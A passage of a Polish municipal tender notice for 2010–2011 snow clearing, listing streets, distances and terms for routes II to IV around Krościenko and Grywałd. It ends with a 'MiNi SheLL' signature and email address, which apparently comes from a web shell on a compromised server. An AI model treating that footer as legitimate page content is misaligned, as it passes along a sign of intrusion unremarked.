Krośnica                                   razem	---------	4,7	4,7
ul.Trakt Królewski	---------	0,4	0,4
ul.Ojca Leona	---------	1,9	1,9
ul.Dziołki	---------	0,3	0,3
ul.Polna	---------	0,7	0,7
ul.Józefa Robotnika (za kościół)	---------	0,6	0,6
ul.Parkowa	---------	0,4	0,4
plac przed remizą OSP - ok.100m2	---------	0,1	0,1
dojazd do 4-ech posesji od ul.Nowotarkiej	---------	0,3	0,3
 	 	 	 
Hałuszowa                               razem	1,5	3,0	4,5
od Majerza do drogi gł. pod Hałuszową	---------	2,1	2,1
Łącznik	---------	0,2	0,2
We wsi (do P.Kołodzieja)	---------	0,7	0,7
oś.Kurzejówka całość od Majerza pod Hałuszową	1,5	---------	1,5
Trasa II                                   razem	1,5	7,7	9,2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Trasa Nr III- Grywałd.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasa III                                                   Grywałd                                             Wymagany sprzęt do odśnieżania samochód z pługiem, ciagnik z pługiem, 	2010-2011
	ilość               km              bez posypywania	ilość               km                       z posypywaniem	razem
ul.Dworska	---------	0,6	0,6
ul.Gielniarz	---------	0,8	0,8
ul.Graniczna (do Sajdaka)	0,6	---------	0,6
ul.Kościelna	---------	0,6	0,6
ul.Krośnicka	---------	0,6	0,6
ul.Krótka 	---------	0,1	0,1
ul.Kwiatowa	---------	0,4	0,4
ul.Lipowa 	---------	0,9	0,9
ul.Lubań	---------	1,8	1,8
ul.Łąkowa	---------	0,5	0,5
ul.Ogrodowa	---------	0,2	0,2
ul.Pienińska	---------	1,4	1,4
ul.Podłazie	0,5	---------	0,5
ul.Podzagonie	---------	1	1,0
ul.Polna (z boczną ul. do Psiarki)	0,4	---------	0,4
ul.Rzeczna	---------	0,2	0,2
ul.Słoneczna 	0,9	---------	0,9
ul.Szkolna	---------	0,7	0,7
ul.Wybraństwo (do Błażusiak)	---------	0,4	0,4
ul.Wymyśle (do Wójcika)	---------	1,3	1,3
ul.Zakopie (do Malika)	---------	0,6	0,6
ul.Żarnowiecka	---------	0,2	0,2
dojazd do cmentarza	---------	0,2	0,2
parking przy kościele  - 700m2	0,7	 	0,7
parking przy szkole    - 300m2	0,3	 	0,3
parking w centrum      - 600m2	0,6	 	0,6
Trasa III                             razem	4,0	12,5	16,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Trasa Nr IV- Krościenko Zawodzie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ IV
Trasa IV                                       Krościenko Zawodzie                             Wymagany sprzęt do odśnieżania samochód z pługiem, ciągnik z pługiem,	2010-2011
	ilość               km              bez posypywania	ilość               km                       z posypywaniem	razem
Chodnik Przyjaźni	1,6	0,1	1,7
ul.Franciszka Koterby-kuriera AK	 	0,4	0,4
ul.Jarek	0,9	 	0,9
ul.Juraszowa	 	1,5	1,5
ul.Karola Wojtyły-papieża	 	0,6	0,6
ul.Leśna	1,1	 	1,1
ul.Polna (do Kaczorowskiego)	 	0,6	0,6
ul.Stanisławy Pawłowskiej	 	0,1	0,1
ul.Stodółki	0,1	 	0,1
ul.Zdrojowa	1,8	 	1,8
ul.Źródlana	 	1,1	1,1
Parking przy ul.Źródlanej	0,6		0,6
Trasa IV                          razem	6,1	4,4	10,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com